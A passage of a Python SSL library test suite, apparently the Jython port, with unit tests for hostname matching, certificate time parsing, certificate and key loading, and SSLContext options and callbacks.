self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, (int, long))
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if "LibreSSL" in s:
self.assertTrue(s.startswith("LibreSSL {:d}.{:d}".format(major, minor)),
(s, t))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = ssl.wrap_socket(s)
wr = weakref.ref(ss)
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# socket.error raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with closing(ssl.wrap_socket(s)) as ss:
self.assertRaises(socket.error, ss.recv, 1)
self.assertRaises(socket.error, ss.recv_into, bytearray(b'x'))
self.assertRaises(socket.error, ss.recvfrom, 1)
self.assertRaises(socket.error, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(socket.error, ss.send, b'x')
self.assertRaises(socket.error, ss.sendto, b'x', ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with closing(ssl.wrap_socket(s)) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors(self):
sock = socket.socket()
self.assertRaisesRegexp(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegexp(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegexp(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
if support.get_java_version() < (1, 9):
# Possible FIXME similar issue as seen in
# test_load_cert_chain - apparently this RSA 1024 cert is too weak and gets a
# java.security.KeyStoreException: Key protection algorithm not found before the
# ValueError raised on earlier versions of Java;
# but we need to confirm this is truly the case on Java 9
with closing(ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE)) as s:
self.assertRaisesRegexp(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(IOError) as cm:
with closing(socket.socket()) as sock:
ssl.wrap_socket(sock, certfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(IOError) as cm:
with closing(socket.socket()) as sock:
ssl.wrap_socket(sock, certfile=CERTFILE, keyfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(IOError) as cm:
with closing(socket.socket()) as sock:
ssl.wrap_socket(sock, certfile=WRONGCERT, keyfile=WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match one left-most wildcard
cert = {'subject': ((('commonName', 'f*.com'),),)}
ok(cert, 'foo.com')
ok(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = u'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
# are supported.
idna = u'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, u'www.pythön.org'.encode("idna").decode("ascii"))
ok(cert, u'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, u'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, u'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.com'),),)}
ok(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b.co*'),),)}
fail(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b*.com'),),)}
with self.assertRaises(ssl.CertificateError) as cm:
ssl.match_hostname(cert, 'axxbxxc.com')
self.assertIn("too many wildcards", str(cm.exception))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with closing(socket.socket()) as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
with closing(ssl.wrap_socket(s)) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with closing(ssl.wrap_socket(s)) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with closing(ssl.wrap_socket(s, server_side=True, certfile=CERTFILE)) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
# TODO Jython better asn1 support, though not sure there's much use for it
# val = ssl._ASN1Object.fromnid(129)
# self.assertEqual(val, expected)
# self.assertIsInstance(val, ssl._ASN1Object)
# self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
# with self.assertRaisesRegexp(ValueError, "unknown NID 100000"):
# ssl._ASN1Object.fromnid(100000)
# for i in range(1000):
# try:
# obj = ssl._ASN1Object.fromnid(i)
# except ValueError:
# pass
# else:
# self.assertIsInstance(obj.nid, int)
# self.assertIsInstance(obj.shortname, str)
# self.assertIsInstance(obj.longname, str)
# self.assertIsInstance(obj.oid, (str, type(None)))
#
# val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
# self.assertEqual(val, expected)
# self.assertIsInstance(val, ssl._ASN1Object)
# self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
# self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
# expected)
# with self.assertRaisesRegexp(ValueError, "unknown object 'serverauth'"):
# ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
ssl.wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatement for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
class ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
self.assertRaises(TypeError, ssl.SSLContext)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
@unittest.skipIf(support.is_jython, "Currently not supported")
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegexp(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3,
ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3 | ssl.OP_NO_TLSv1,
ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_SSLv2) | ssl.OP_NO_TLSv1
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_TLSv1 | ssl.OP_NO_SSLv3,
ctx.options)
ctx.options = 0
self.assertEqual(0, ctx.options)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
if support.get_java_version() < (1, 9):
# Possible FIXME we may be skipping this test on Java 9 unnecessarily.
# CERTFILE as generated uses RSA 1024, which is considered too weak.
# This may be why this raises an error on Java 9:
# java.security.KeyStoreException: Key protection algorithm not found:
# java.security.KeyStoreException: Certificate chain is not valid
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(IOError) as cm:
ctx.load_cert_chain(WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaisesRegexp(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(SVN_PYTHON_ORG_ROOT_CERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegexp(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegexp(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegexp(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegexp(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegexp(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
ctx.load_verify_locations(cafile=BYTES_CERTFILE.decode('utf-8'))
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(IOError) as cm:
ctx.load_verify_locations(WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(IOError):
ctx.load_verify_locations(u'')
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read().decode("ascii")
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read().decode("ascii")
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegexp(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata=u"broken")
with self.assertRaisesRegexp(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
@unittest.skipIf(support.is_jython, "Not yet supported on Jython")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(IOError) as cm:
ctx.load_dh_params(WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
